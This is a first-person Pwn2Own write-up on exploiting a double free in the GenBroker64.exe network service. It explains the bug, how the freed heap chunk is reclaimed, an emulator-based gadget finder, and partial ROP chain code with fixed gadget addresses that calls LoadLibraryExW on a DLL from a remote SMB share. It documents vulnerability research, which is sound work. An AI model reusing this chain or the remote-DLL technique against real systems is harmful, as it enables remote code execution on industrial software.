I had been playing with the COM thing for a while now, but something big had been in front of my eyes this whole time. One afternoon, I was messing around and started loading some of the candidates I gathered earlier, and GenBroker64.exe crashed:
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
OLEAUT32!VarWeekdayName+0x22468:
00007ffa`e620c7f8 488b01 mov rax,qword ptr [rcx] ds:00000000`2e5a2fd0=????????????????
What the hell, I thought? I tried it again.. and the crash reproduced.
Understanding the bug
After looking at the code closer, I started to understand what was going on. In operator>>, we can see that if the Load() call throws an exception, it is caught to clean up, and both pPersistStream and pSrc->punkVal are released ([2]). That makes sense.
CArchive& AFXAPI operator>>(CArchive& ar, COleVariant& varSrc) {
LPVARIANT pSrc = &varSrc;
ar >> pSrc->vt;
// ...
switch(pSrc->vt) {
// ...
case VT_DISPATCH:
case VT_UNKNOWN: {
LPPERSISTSTREAM pPersistStream = NULL;
CArchiveStream stm(&ar);
// ...
// [1]
SCODE sc = CoCreateInstance(clsid, NULL,
CLSCTX_ALL | CLSCTX_REMOTE_SERVER,
pSrc->vt == VT_UNKNOWN ? IID_IUnknown : IID_IDispatch,
(void**)&pSrc->punkVal);
// ...
TRY {
sc = pSrc->punkVal->QueryInterface(
IID_IPersistStream, (void**)&pPersistStream);
// ...
AfxCheckError(pPersistStream->Load(&stm));
} CATCH_ALL(e) {
// [2]
if(pPersistStream != NULL) {
pPersistStream->Release();
}
pSrc->punkVal->Release();
THROW_LAST();
}
The subtlety, though, is that the pointer to the instantiated COM object has been written into pSrc ([1]). pSrc points to the VARIANT object that the caller passed. This is an important detail because Utils::ReadVariant will also catch any exceptions, and will clear Variant:
void Utils::ReadVariant(tagVARIANT *Variant, Archive_t *Archive, int Level) {
TRY {
return ReadVariant_((CArchive *)Archive, (COleVariant *)Variant);
} CATCH_ALL(e) {
VariantClear(Variant);
}
}
Because Variant has been modified by operator>>, VariantClear sees that the variant is holding a COM instance, and so it releases it, which leads to a double free... Unfortunately, IDA (still?) doesn't have good support for exception handling in the Hex-Rays decompiler, which makes it hard to see that logic.

This bug is interesting. I feel like the MFC operator>> could protect callers from bugs like this by NULL'ing out pSrc->punkVal after releasing it, and updating the variant type to VT_EMPTY. Or, it could modify pSrc only when the function is about to return successfully, but not before. Otherwise it is hard for the exception handler of Utils::ReadVariant to even know whether Variant needs to be cleared or not. But who knows, there might be legitimate reasons as to why the operator works this way. Regardless, I wouldn't be surprised if bugs like this exist in other applications. Check out paracosme-poc.py if you would like to trigger this behavior.
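To make the ownership problem concrete, here is a toy Python model of the two nested exception handlers. Every name in it (FakeComObject, FakeVariant, mfc_read, read_variant) is made up for illustration; it only mimics the reference counting and is not the MFC or OLE code. The clear_on_failure flag models the hardening idea discussed above.

```python
class FakeComObject:
    """Toy stand-in for a COM object with a reference count."""

    def __init__(self):
        self.refcount = 1
        self.freed = False

    def release(self):
        if self.freed:
            raise RuntimeError("Release() called on a freed object")
        self.refcount -= 1
        if self.refcount == 0:
            self.freed = True


class FakeVariant:
    """Toy stand-in for a VARIANT holding an interface pointer."""

    def __init__(self):
        self.vt = "VT_EMPTY"
        self.punk = None


def mfc_read(variant, clear_on_failure):
    """Mimics operator>>: stores the object in the variant, then Load() fails."""
    variant.vt = "VT_UNKNOWN"
    variant.punk = FakeComObject()
    try:
        raise ValueError("Load() failed")
    except ValueError:
        variant.punk.release()      # first release, like [2]
        if clear_on_failure:        # hypothetical hardening
            variant.punk = None
            variant.vt = "VT_EMPTY"
        raise


def read_variant(variant, clear_on_failure=False):
    """Mimics the outer handler: catches the exception and clears the variant."""
    try:
        mfc_read(variant, clear_on_failure)
    except ValueError:
        if variant.vt == "VT_UNKNOWN" and variant.punk is not None:
            variant.punk.release()  # second release on the same object
```

Calling read_variant(FakeVariant()) raises the RuntimeError that stands in for the double free, while read_variant(FakeVariant(), clear_on_failure=True) returns cleanly because the outer handler no longer sees a live pointer.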
The planets were slowly aligning, and I was still in the game. There should be enough time to build an exploit based on what I know. Before digging into the exploit engineering, let's do a recap:
- GenBroker64.exe listens on TCP:38080 and deserializes messages sent by the client
- Although it tries to allow only certain VARIANT types, there is a bug. If the user sends a VT_EMPTY VARIANT, the MFC operator>> is called, which will read a VARIANT off the stream. GenBroker64.exe doesn't rewind the stream, so the MFC reads another VARIANT type that doesn't go through the allow list. This makes it possible to bypass the allow list and have the MFC instantiate an arbitrary COM object.
- If the COM object throws an exception while either the QueryInterface or Load method is called, the instantiated COM object will be double-free'd. The second free is done by VariantClear, which internally calls the object's virtual Release method.
If we can reclaim the freed memory after the first free but before VariantClear, then we control a vtable pointer, and as a result hijack control flow.
Let's now work on engineering planet alignments.
Can I reclaim the chunk with controlled data?
I had a lot of questions but the important ones were:
- Can I run multiple clients at the same time, and if so, can I use them to reclaim the memory chunk?
- Is there any behavior in the heap allocator that prevents another thread from reclaiming the chunk?
- Assuming I can reclaim it, can I fill it with controlled data?
To answer the first two questions, I ran GenBroker64.exe under a debugger to verify that I could execute other clients while the target thread was frozen. While doing that, I also confirmed that the freed chunk can be reclaimed by another client when the target thread is frozen right after the first free.
The third question was a lot more work though. I first looked into leveraging another COM object that allowed me to fill the reclaimed chunk with arbitrary content via the Load method. I modified the tooling I wrote to enumerate and find suitable candidates, but I eventually walked away. Many COM objects used a different allocator or were allocating off a different heap, and I never really found one that allowed me to control as much of the reclaimed chunk as I wanted.
I moved on, and started to look at using a different message to both reclaim and fill the chunk with controlled content. The message with the id 0x7d0 fits the bill exactly: it allows for an allocation of an arbitrary size and lets the client fully control its content, which is perfect. The function that deserializes this message allocates and fills up an array of arbitrary size made of 32-bit integers, and this is what it looks like:
void __fastcall PayloadReq7D0_t::ReadFromArchive(PayloadReq7D0_t *Payload, Archive_t *Archive) {
// ...
if ( (Archive->m_nMode & ArchiveReadMode) != 0 )
{
Archive::ReadString((CArchive *)Archive, (CString *)Payload);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->ProgId);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->StringC);
Archive::ReadUint32_(Archive, &Payload->qword18);
Archive::ReadUint32_(Archive, &Payload->BufferSize);
BufferSize = Payload->BufferSize;
if ( BufferSize )
{
Buffer = calloc(BufferSize, 4ui64);
Payload->Buffer = Buffer;
if ( Buffer )
{
for ( i = 0i64; (unsigned int)i < Payload->BufferSize; Archive->m_lpBufCur += 4 )
{
Entry = &Payload->Buffer[i];
// ...
*Entry = *(_DWORD *)m_lpBufCur;
}
// ...
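As a rough sketch of how a client could size that array: calloc(BufferSize, 4) allocates BufferSize * 4 bytes, so reclaiming the 0xc0-byte freed object means asking for 0x30 entries. The helper below is hypothetical and only builds the list of 32-bit values; the framing of the 0x7d0 message itself is not shown in this post, so it is left out.

```python
import struct

CHUNK_SIZE = 0xC0  # size of the freed object, as stated in this write-up


def build_dword_array(qwords):
    """Turn a list of 64-bit values into (count, dwords) for a 0xc0-byte chunk.

    Hypothetical helper: the chunk is zero-padded to CHUNK_SIZE and then
    split into little-endian 32-bit integers, which is the unit the
    deserializer copies.
    """
    raw = b"".join(struct.pack("<Q", q) for q in qwords)
    if len(raw) > CHUNK_SIZE:
        raise ValueError("too many qwords for the chunk")
    raw = raw.ljust(CHUNK_SIZE, b"\x00")
    dwords = struct.unpack(f"<{CHUNK_SIZE // 4}I", raw)
    return len(dwords), dwords


count, dwords = build_dword_array([0x1400AED08, 0xBBBBBBBBBBBBBBBB])
```

Here count is the value a client would place in BufferSize, and dwords are the entries that end up back to back in the reclaimed allocation.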
Hijacking control flow & ROPing to get arbitrary native code execution
Once I identified the right memory primitives, hijacking control flow was pretty straightforward. As I mentioned above, VariantClear reads the first 8 bytes of the object as a pointer to a virtual table. Then, it reads off this virtual table at a specific offset and dispatches an indirect call. This is the assembly code with @rcx pointing to the variant that we reclaimed and filled with arbitrary content:
0:011> u . l3
OLEAUT32!VariantClear+0x20b:
00007ffb`0df751cb mov rax,qword ptr [rcx]
00007ffb`0df751ce mov rax,qword ptr [rax+10h]
00007ffb`0df751d2 call qword ptr [00007ffb`0df82660]
0:011> u poi(00007ffb`0df82660)
OLEAUT32!SetErrorInfo+0xec0:
00007ffb`0deffd40 jmp rax
The first instruction reads the virtual table address into @rax, then the Release virtual method address is read at offset 0x10 from the table, and finally, Release is called via an indirect call. Imagine that the below is the content of the reclaimed variant object:
0x11111111'11111111
0x22222222'22222222
0x33333333'33333333
Execution will be redirected to [0x11111111'11111111 + 0x10], which means:
- 0x11111111'11111111 needs to be an address that points somewhere readable in the address space to not crash,
- At the same time, the QWORD stored at that address plus the offset 0x10 needs to point to where we want to pivot execution.
I was like, ugh, this constrained call primitive is a bit annoying. Another crucial piece that we haven't brought up yet is... ASLR. Fortunately for us, the main module GenBroker64.exe isn't randomized, although the rest of the address space is. Technically this is false because GenClient64.dll wasn't randomized either, but I quickly ditched it as it was tiny and uninteresting. The only option for us is to use gadgets from GenBroker64.exe because we do not have a way to leak information about the target's address space. On top of that, the use-after-free'd object is 0xc0 bytes long, which didn't give us a lot of room for a ROP chain (at best 0xc0 / 8 = 24 slots).
All those constraints felt overwhelming at first, so I decided to address them one by one. What do we need from our ROP chain? The ROP chain needs to demonstrate arbitrary code execution, which is commonly done by popping a shell. Because of ASLR, we don't know where CreateProcess or similar are in memory. We are stuck with reusing functions imported by GenBroker64.exe. This is possible because we know where its Import Address Table is, and we know API addresses are populated in this table by the PE loader when the process is created. Unfortunately, GenBroker64.exe doesn't import anything super exciting:

The only obvious import that stood out was LoadLibraryExW. It allows loading a DLL hosted on a remote share. This is cool, but it also means we need to burn space in the reclaimed heap chunk just to store a UTF-16 string that looks like the following: \\192.168.1.1\x\a.dll\x00. This is already 44 bytes (22 UTF-16 code units, terminator included).
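The space cost of that string is easy to check. The snippet below is a small sketch (the utf16_size helper is made up for illustration) that counts the bytes of a NUL-terminated UTF-16LE path and how many 8-byte ROP slots it eats.

```python
def utf16_size(path):
    """Bytes needed for a NUL-terminated UTF-16LE copy of `path`."""
    return len((path + "\x00").encode("utf-16-le"))


remote_dll = r"\\192.168.1.1\x\a.dll"
size = utf16_size(remote_dll)

# Number of 8-byte slots consumed in the 0xc0-byte chunk (rounded up).
slots = -(-size // 8)

# A longer IP address costs more room, which matters when space is this tight.
longer = utf16_size(r"\\192.168.100.100\x\a.dll")
```

With the short address the string takes 44 bytes, that is 6 of the 24 available slots; the longer address needs 52 bytes.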
How the hell do we boost the constrained call primitive into an arbitrary call primitive? Given the constraints, looking for that magic gadget was painful and a bit of a walk in the desert. I started doing it manually and focusing on virtual tables because in essence.. we need a very specific one. On top of being well formed, the function pointer at offset 0x10 needs to point to a piece of code that is useful for us. After hours and hours of prototyping, searching, and trying ideas, I lost hope. It was so weird because it felt like I was so close but so far away at the same time.
I switched gears and decided to write a brute-force tool. The idea was to capture a crash dump when I hijack control flow, load it in an emulator, and replace the virtual table pointer with EVERY addressable part of GenBroker64.exe. The emulator executes forward and catches crashes. When one occurs, I can check postconditions such as 'Does RIP have a value that looks like a controlled value?'. I initially wrote this as a quick & dirty script but recently rewrote it in Rust as a learning exercise. I'll try to clean it up and release it if people are interested. The pre function runs before the emulator starts executing; it inserts the candidate address right where the vtable pointer is expected to be, to simulate our exploit:
impl Finder for Pwn2OwnMiami2022_1 {
fn pre(&mut self, emu: &mut Emu, candidate: u64) -> Result<()> {
// ```
// (1574.be0): Access violation - code c0000005 (first/second chance not available)
// For analysis of this file, run !analyze -v
// oleaut32!VariantClearWorker+0xff:
// 00007ffb`3a3dc7fb 488b4010 mov rax,qword ptr [rax+10h] ds:deadbeef`baadc0ee=????????????????
//
// 0:011> u . l3
// oleaut32!VariantClearWorker+0xff:
// 00007ffb`3a3dc7fb 488b4010 mov rax,qword ptr [rax+10h]
// 00007ffb`3a3dc7ff ff15c3ce0000 call qword ptr [oleaut32!_guard_dispatch_icall_fptr (00007ffb`3a3e96c8)]
//
// 0:011> u poi(00007ffb`3a3e96c8)
// oleaut32!guard_dispatch_icall_nop:
// 00007ffb`3a36e280 ffe0 jmp rax
// ```
let rcx = emu.rcx();
// Rewind to the instruction right before the crash:
// ```
// 0:011> ub .
// oleaut32!VariantClearWorker+0xe6:
// ...
// 00007ffb`3a3dc7f8 488b01 mov rax,qword ptr [rcx]
// ```
emu.set_rip(0x00007ffb_3a3dc7f8);
// Overwrite the buffer we control with the `MARKER_PAGE_ADDR`. The first qword
// is used to hijack control flow, so this is where we write the candidate
// address.
for qword in 0..18 {
let idx = qword * std::mem::size_of::<u64>();
let idx = idx as u64;
let value = if qword == 0 {
candidate
} else {
MARKER_PAGE_ADDR.u64()
};
emu.virt_write(Gva::new(rcx + idx), &value)?;
}
Ok(())
}
fn post(&mut self, emu: &Emu) -> Result<bool> {
// ...
}
}
The post function runs after the emulator has halted (because of a crash or a timeout). The code below tries to identify a tainted RIP:
impl Finder for Pwn2OwnMiami2022_1 {
fn pre(&mut self, emu: &mut Emu, candidate: u64) -> Result<()> {
// ...
}
fn post(&mut self, emu: &Emu) -> Result<bool> {
// What we want here, is to find a sequence of instructions that leads to @rip
// being controlled. To do that, in the |Pre| callback, we populate the buffer
// we control with the `MARKER_PAGE_ADDR`, which is a magic address
// that'll trigger a fault if it's accessed/written to / executed. Basically,
// we want to force a crash as this might mean that we successfully found a
// gadget that'll allow us to turn the constrained arbitrary call from above,
// into an unconstrained one where we don't need to worry about dereferences
// (cf |mov rax, qword ptr [rax+10h]|).
//
// Here is the gadget I ended up using:
// ```
// 0:011> u poi(1400aed18)
// 00007ffb2137ffe0 sub rsp,38h
// 00007ffb2137ffe4 test rcx,rcx
// 00007ffb2137ffe7 je 00007ffb`21380015
// 00007ffb2137ffe9 cmp qword ptr [rcx+10h],0
// 00007ffb2137ffee jne 00007ffb`2137fff4
// ...
// 00007ffb2137fff4 and qword ptr [rsp+40h],0
// 00007ffb2137fffa mov rax,qword ptr [rcx+10h]
// 00007ffb2137fffe call qword ptr [mfc140u!__guard_dispatch_icall_fptr (00007ffb`21415b60)]
// ```
let mask = 0xffffffff_ffff0000u64;
let marker = MARKER_PAGE_ADDR.u64();
let rip_has_marker = (emu.rip() & mask) == (marker & mask);
Ok(rip_has_marker)
}
}
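The postcondition boils down to a masked comparison. Here is the same check as a minimal Python sketch; the marker value below is a hypothetical placeholder (the real MARKER_PAGE_ADDR of the tool isn't shown here). Comparing only the upper 48 bits presumably tolerates small displacements that a gadget may add to the marker before jumping to it.

```python
MASK = 0xFFFFFFFF_FFFF0000

# Hypothetical marker value chosen for this example only.
MARKER_PAGE_ADDR = 0x0000_1337_4242_0000


def rip_has_marker(rip, marker=MARKER_PAGE_ADDR):
    """True when rip lands in the same 64KB window as the marker."""
    return (rip & MASK) == (marker & MASK)
```

For instance, a RIP of MARKER_PAGE_ADDR + 0x18 still counts as tainted, while an address inside GenBroker64.exe such as 0x1400aed08 does not.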
I went for lunch to take a break and let the brute force run while I was out. I came back and started to see exciting results:

Although it took multiple iterations to tighten the postconditions to eliminate false positives, I eventually found glorious 0x1400aed08. Let's run through what glorious 0x1400aed08 does. Small reminder, this is the code we hijack control flow from:
00007ffb`0df751cb mov rax,qword ptr [rcx]
00007ffb`0df751ce mov rax,qword ptr [rax+10h]
00007ffb`0df751d2 call qword ptr [00007ffb`0df82660] ; points to jmp @rax
Okay, the first instruction reads the first QWORD in the heap chunk, which we'll set to 0x1400aed08. The second instruction reads the QWORD at 0x1400aed08+0x10, which points to the function mfc140u!CRuntimeClass::CreateObject:
0:011> dqs 0x1400aed08+10
00000001`400aed18 00007ffb`2137ffe0 mfc140u!CRuntimeClass::CreateObject [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\objcore.cpp @ 127]
Execution is transferred to 0x7ffb2137ffe0 / mfc140u!CRuntimeClass::CreateObject, which does the following:
0:011> u 00007ffb2137ffe0
00007ffb2137ffe0 sub rsp,38h
00007ffb2137ffe4 test rcx,rcx
00007ffb2137ffe7 je 00007ffb`21380015 ; @rcx is never going to be zero, so we won't take this jump
00007ffb2137ffe9 cmp qword ptr [rcx+10h],0 ; @rcx+0x10 is populated with data from our future ROP chain
00007ffb2137ffee jne 00007ffb`2137fff4 ; so it will never be zero meaning we'll take this jump always
...
00007ffb2137fff4 and qword ptr [rsp+40h],0
00007ffb2137fffa mov rax,qword ptr [rcx+10h]
00007ffb2137fffe call qword ptr [mfc140u!__guard_dispatch_icall_fptr (00007ffb`21415b60)]
0:011> u poi(00007ffb`21415b60)
mfc140u!_guard_dispatch_icall_nop [D:\a01\_work\6\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_dispatch.asm @ 53]:
00007ffb`21407190 ffe0 jmp rax
Okay, so this is .. amazing. It reads at offset 0x10 off our chunk, and assuming it isn't zero it will redirect execution there. If we set up the reclaimed chunk to have the first QWORD be 0x1400aed08, and the one at offset 0x10 be 0xdeadbeefbaadc0de, then execution is redirected to 0xdeadbeefbaadc0de. This precisely boosts the constrained call primitive into an arbitrary call primitive. This is solid progress, and it filled me with hope.
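The two hops can be replayed on paper with a tiny fake memory. This is only a sketch: the dictionary stands in for the process address space, the function names are made up, and the addresses are the ones visible in the debugger output of this post (the chunk address comes from one particular crash dump).

```python
CREATE_OBJECT = 0x7FFB2137FFE0     # mfc140u!CRuntimeClass::CreateObject in the dump
VTABLE_CANDIDATE = 0x1400AED08     # the address found by the brute force
CHUNK = 0x1970BF00                 # reclaimed heap chunk in one crash dump
TARGET = 0xDEADBEEFBAADC0DE        # where we want execution to land

# Fake memory: address -> QWORD stored there.
memory = {
    VTABLE_CANDIDATE + 0x10: CREATE_OBJECT,
    CHUNK + 0x00: VTABLE_CANDIDATE,
    CHUNK + 0x08: 0xBBBBBBBBBBBBBBBB,
    CHUNK + 0x10: TARGET,
}


def variant_clear_dispatch(rcx):
    """mov rax,[rcx] ; mov rax,[rax+10h] ; jmp rax"""
    rax = memory[rcx]
    return memory[rax + 0x10]


def create_object_gadget(rcx):
    """test rcx,rcx ; cmp qword [rcx+10h],0 ; mov rax,[rcx+10h] ; jmp rax"""
    if rcx == 0 or memory[rcx + 0x10] == 0:
        raise ValueError("the gadget would take the other branch")
    return memory[rcx + 0x10]


first_hop = variant_clear_dispatch(CHUNK)   # constrained call
final_rip = create_object_gadget(CHUNK)     # arbitrary call
```

The first hop needs a double dereference through a fixed address in GenBroker64.exe, whereas the second one reads its target straight from the chunk, which is why a single QWORD at offset 0x10 is enough to pick any destination.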
With an arbitrary call primitive in hand, we need to find a way to kick-start a ROP chain. Usually, the easiest way to do that is to pivot the stack to an area you control. Chaining the gadgets is then as easy as returning to the next one in line. Unfortunately, finding this pivot was also pretty annoying. GenBroker64.exe is fairly small in size and doesn't offer many super valuable gadgets. Another wall.
I decided to try to find the pivot gadget with my tool. Like in the previous example, I injected the candidate address at the right place, and looked for a stack pivoted inside the heap chunk we have control over as well as a tainted RIP:
impl Finder for Pwn2OwnMiami2022_2 {
fn pre(&mut self, emu: &mut Emu, candidate: u64) -> Result<()> {
// Here, we continue where we left off after the gadget found in |miami1|,
// where we went from constrained arbitrary call, to unconstrained arbitrary
// call. At this point, we want to pivot the stack to our heap chunk.
//
// ```
// (1de8.1f6c): Access violation - code c0000005 (first/second chance not available)
// For analysis of this file, run !analyze -v
// mfc140u!_guard_dispatch_icall_nop:
// 00007ffd`57427190 ffe0 jmp rax {deadbeef`baadc0de}
//
// 0:011> dqs @rcx
// 00000000`1970bf00 00000001`400aed08 GenBroker64+0xaed08
// 00000000`1970bf08 bbbbbbbb`bbbbbbbb
// 00000000`1970bf10 deadbeef`baadc0de <-- this is where @rax comes from
// 00000000`1970bf18 61616161`61616161
// ```
self.rcx_before = emu.rcx();
// Fix up @rax with the candidate's address.
emu.set_rax(candidate);
// Fix up the buffer, where the address of the candidate would be if we were
// executing it after |miami1|.
let size_of_u64 = std::mem::size_of::<u64>() as u64;
let third_qword_offset = size_of_u64 * 2;
emu.virt_write(Gva::from(self.rcx_before + third_qword_offset), &candidate)?;
// Overwrite the buffer we control with the `MARKER_PAGE_ADDR`. Skip the first 3
// qwords, because the first and third ones are already used to hijack flow
// and the second we skip it as it makes things easier.
for qword_idx in 3..18 {
let byte_idx = qword_idx * size_of_u64;
emu.virt_write(
Gva::from(self.rcx_before + byte_idx),
&MARKER_PAGE_ADDR.u64(),
)?;
}
Ok(())
}
fn post(&mut self, emu: &Emu) -> Result<bool> {
// Let's check if we pivoted into our buffer AND that we also are able to
// start a ROP chain.
let wanted_landing_start = self.rcx_before + 0x18;
let wanted_landing_end = self.rcx_before + 0x90;
let pivoted = has_stack_pivoted_in_range(emu, wanted_landing_start..=wanted_landing_end);
let mask = 0xffffffff_ffff0000;
let rip = emu.rip();
let rip_has_marker = (rip & mask) == (MARKER_PAGE_ADDR.u64() & mask);
let is_interesting = pivoted && rip_has_marker;
Ok(is_interesting)
}
}
After running it for a while, 0x14005bd25 appeared:

Let's run through what happens when execution is redirected to 0x14005bd25:
0:011> u 0x14005bd25 l3
GenBroker64+0x5bd25:
00000001`4005bd25 8be1 mov esp,ecx
00000001`4005bd27 803d5a2a0a0000 cmp byte ptr [GenBroker64+0xfe788 (00000001`400fe788)],0
00000001`4005bd2e 0f8488010000 je GenBroker64+0x5bebc (00000001`4005bebc)
0:011> db 00000001`400fe788 l1
00000001`400fe788 00 .
0:011> u 00000001`4005bebc l0n11
GenBroker64+0x5bebc:
00000001`4005bebc 4c8d5c2460 lea r11,[rsp+60h]
00000001`4005bec1 498b5b30 mov rbx,qword ptr [r11+30h]
00000001`4005bec5 498b6b38 mov rbp,qword ptr [r11+38h]
00000001`4005bec9 498b7340 mov rsi,qword ptr [r11+40h]
00000001`4005becd 498be3 mov rsp,r11
00000001`4005bed0 415f pop r15
00000001`4005bed2 415e pop r14
00000001`4005bed4 415d pop r13
00000001`4005bed6 415c pop r12
00000001`4005bed8 5f pop rdi
00000001`4005bed9 c3 ret
This one is interesting. The first instruction effectively pivots the stack to the heap chunk under our control. What is weird about it is that it uses the 32-bit registers esp & ecx and not rsp & rcx. If either the stack or our heap buffer were to be allocated inside a region above 0xffff'ffff, things would go wrong (because of truncation).
0:011> r @rsp
rsp=000000001961acd8
0:011> r @rcx
rcx=000000001970bf00
There's no way both of those addresses are always allocated under 0xffff'ffff, I thought. I must have gotten lucky when I captured the crash dump. But after running it multiple times, it seemed like both the heap and the stack addresses always fit into a 32-bit register. This was unexpected, and I don't know why the kernel always seems to lay out those regions in the lower part of the virtual address space. Regardless, I was happy about it.
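The truncation risk is easy to illustrate. On x86-64, writing a 32-bit register zero-extends the result into the full 64-bit register, so mov esp, ecx keeps only the low 32 bits of @rcx. The sketch below models just that; the high address is a made-up example, not one observed on the target.

```python
def mov_esp_ecx(rcx):
    """Model `mov esp, ecx`: the 32-bit write zero-extends into rsp."""
    return rcx & 0xFFFFFFFF


low_chunk = 0x00000000_1970BF00    # heap address seen in the crash dump
high_chunk = 0x00000201_1970BF00   # hypothetical address above 4GB

rsp_low = mov_esp_ecx(low_chunk)
rsp_high = mov_esp_ecx(high_chunk)
```

With the low address the new stack pointer equals the chunk address, so the pivot works. With the high address it becomes 0x1970bf00 instead, which no longer points at the chunk.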
After pivoting the stack, it reads three values into @rbx, @rbp & @rsi at different offsets from @r11. @r11 is pointing to @rsp+0x60, which is at offset 0x60 from the heap chunk start. This is fine because we have control over 0xc0 bytes, which keeps the offsets 0x90 / 0x98 / 0xa0 in bounds. After that, the stack is pivoted again a little further via the mov rsp, r11 instruction, which moves it 0x60 bytes forward. From there, five pointers are popped off the stack, giving us control over @r15 / @r14 / @r13 / @r12 / @rdi.
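To keep track of which slot of the chunk feeds which register, the gadget can be walked through symbolically. The function below is a made-up bookkeeping helper that follows the disassembly above instruction by instruction and records the address each register is loaded from.

```python
def pivot_layout(chunk):
    """Return where each register is loaded from when the pivot gadget runs."""
    rsp = chunk & 0xFFFFFFFF        # mov esp, ecx
    r11 = rsp + 0x60                # lea r11, [rsp+60h]
    saved = {
        "rbx": r11 + 0x30,          # mov rbx, [r11+30h]
        "rbp": r11 + 0x38,          # mov rbp, [r11+38h]
        "rsi": r11 + 0x40,          # mov rsi, [r11+40h]
    }
    rsp = r11                       # mov rsp, r11
    pops = {}
    for reg in ("r15", "r14", "r13", "r12", "rdi"):
        pops[reg] = rsp             # pop <reg>
        rsp += 8
    ret_slot = rsp                  # ret: address of the first ROP gadget
    return saved, pops, ret_slot


base = 0x1970BF00
saved, pops, ret_slot = pivot_layout(base)
offsets = {reg: addr - base for reg, addr in {**saved, **pops}.items()}
```

For a chunk below 4GB, the five pops consume offsets 0x60 through 0x80, the ret takes the first gadget address from offset 0x88, and the chain continues from 0x90, which leaves six slots before the end of the 0xc0-byte chunk.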
What's next now? We made a lot of progress, but what we've been doing until now is just setting things up to do useful things. The puzzle pieces are yet to be arranged to call LoadLibraryExW(L"\\\\192.168.0.1\\x\\a.dll\x00", 0, 0). The target is a 64-bit process, so we need to load @rcx with a pointer to the string. Both @rdx & @r8 need to be set to zero. To call LoadLibraryExW, we need to dereference its IAT entry at 0x1400ae418, and redirect execution there:
0:011> dqs 0x1400ae418 l1
00000001`400ae418 00007ffd`7028e4f0 kernel32!LoadLibraryExWStub
We will put the string in the heap chunk, so we just need to find a way to load its address in @rcx. @rcx points to the start of our heap chunk, so we need to add an offset to it. I did this with an add ecx, dword [rbp-0x75] gadget. I load @rbp with an address that points to the value I need to add to @ecx. Depending on where our heap chunk is allocated, the add ecx could trigger problems similar to the stack pivot's, but testing showed that the address always landed in the lower 4GB of the address space, making it safe.
# Set @rbp to an address that points to the value 0x30. This is used
# to adjust the @rcx pointer to the remote dll path from above.
# 0x1400022dc: pop rbp ; ret ; (717 found)
pop_rbp_gadget_addr = 0x1400022DC
# > rp-win-x64.exe --file GenBroker64.exe --search-hexa=\x30\x00\x00\x00
# 0x1400a2223: 0\x00\x00\x00
_0x30_ptr_addr = 0x1400A2223
p += p64(pop_rbp_gadget_addr)
p += p64(_0x30_ptr_addr + 0x75)
left -= 8 * 2
# Adjust the @rcx pointer to point to the remote dll path using the
# 0x30 pointer loaded in @rbp from above.
# 0x14000e898: add ecx, dword [rbp-0x75] ; ret ; (1 found)
add_ecx_gadget_addr = 0x14000E898
p += p64(add_ecx_gadget_addr)
left -= 8
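The arithmetic behind those two gadgets can be double-checked with a small model. This is a sketch under assumptions: the function name is made up, the fake memory only contains the 0x30 DWORD located by rp-win-x64 above, and the chunk address is the one from the crash dump shown earlier.

```python
def add_ecx_dword_rbp(rcx, rbp, read_dword):
    """Model `add ecx, dword [rbp-0x75]`; the 32-bit result zero-extends into rcx."""
    return (rcx + read_dword(rbp - 0x75)) & 0xFFFFFFFF


ZERO_X30_PTR = 0x1400A2223            # address holding the DWORD 0x30
fake_memory = {ZERO_X30_PTR: 0x30}    # stand-in for GenBroker64.exe's memory

chunk = 0x1970BF00                    # @rcx: start of the reclaimed chunk
rbp = ZERO_X30_PTR + 0x75             # value popped by the `pop rbp` gadget

new_rcx = add_ecx_dword_rbp(chunk, rbp, fake_memory.__getitem__)
```

Biasing @rbp by 0x75 cancels the displacement baked into the gadget, so @rcx ends up 0x30 bytes into the chunk, where the remote DLL path is expected to live.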
It is convenient to have the stack pivoted into a heap chunk under our control, but it is dangerous to call LoadLibraryExW in that state. It will corrupt neighboring chunks, risk accessing unmapped memory, etc. It's bad. Very bad. We don't necessarily need to pivot the stack back to where it was before, but we need to pivot it into a reasonably large region of memory whose content stays the same, or at least doesn't change often. After several tests, pivoting to GenClient64's data section seemed to work well:
0:011> !dh -a genclient64
SECTION HEADER #3
.data name
6C80 virtual size
12B000 virtual address
C0000040 flags
Read Write
I reused the pop rbp gadget, and used a leave; call qword [@r14+0x08] gadget to both pivot the stack and redirect execution to LoadLibraryExW. It isn't reflected well in this article, but finding this gadget was also annoying. The challenge was to be able to pivot the stack and call LoadLibraryExW at the same time. I have no control over GenClient64's data section, which means I lose control of the execution flow if I only pivot there. On top of that, I was tight on available space.

Phew, we did it. Putting this ROP chain together was a struggle and was nerve-wracking. But you know, making constant small incremental progress led us to the summit. There were other challenges I ran into that I didn't describe in this article though. One of them was that I first tried to deliver the payload via a WebDAV share instead of SMB. What would happen is that the first time the link was fed to LoadLibraryExW, it would fail, but the second time the payload would pop. I spent time reverse-engineering mrxdav.sys to understand what was different between the first and the second time the load request was sent, but I can't remember what the reason was. Yeah, I know, super helpful. Another essential property of this vulnerability is that losing the race doesn't lead to a crash. This means the exploit can try as many times as it needs to.
After weeks of grinding against this target after work, I finally had something that could be demonstrated during the contest. What a crazy ride.
๐ Entering the contest
At this point in the journey, it is probably the end of November or mid-December 2021. The contest is happening at the end of January, so timeline-wise, it is looking great. There's time to test the exploit, tweak it to maximize the chances of landing successfully, and develop a payload for style points at the contest and have some fun. I am feeling good and am preparing for a vacation trip to France to see my family and take a break.
I'm not sure exactly when this happened, but COVID-19 pushed the competition back to the 19th / 21st of April 2022. This was a bummer as I had worked hard to be on time. I was disappointed, but it wasn't the worst thing to happen. I could relax a bit more and hope this extra time wouldn't allow the vendor to find and fix the vulnerability I planned to exploit. This part was a bit nerve-wracking as I didn't know any of the vendors, so I wasn't sure if this was something likely to happen or not.
Testing the exploit wasn't the most fun activity, but I was determined to do all the due diligence on my side as I wanted to maximize my chances of winning. I knew the target software would run in a VMware virtual machine, so I downloaded it, and set one up. It felt silly as I had done my tests in a Hyper-V VM, and I didn't expect that a different hypervisor would change anything. Whatever. I get amazed every day at how complex and tricky to predict computers are, so I knew it might be useful.
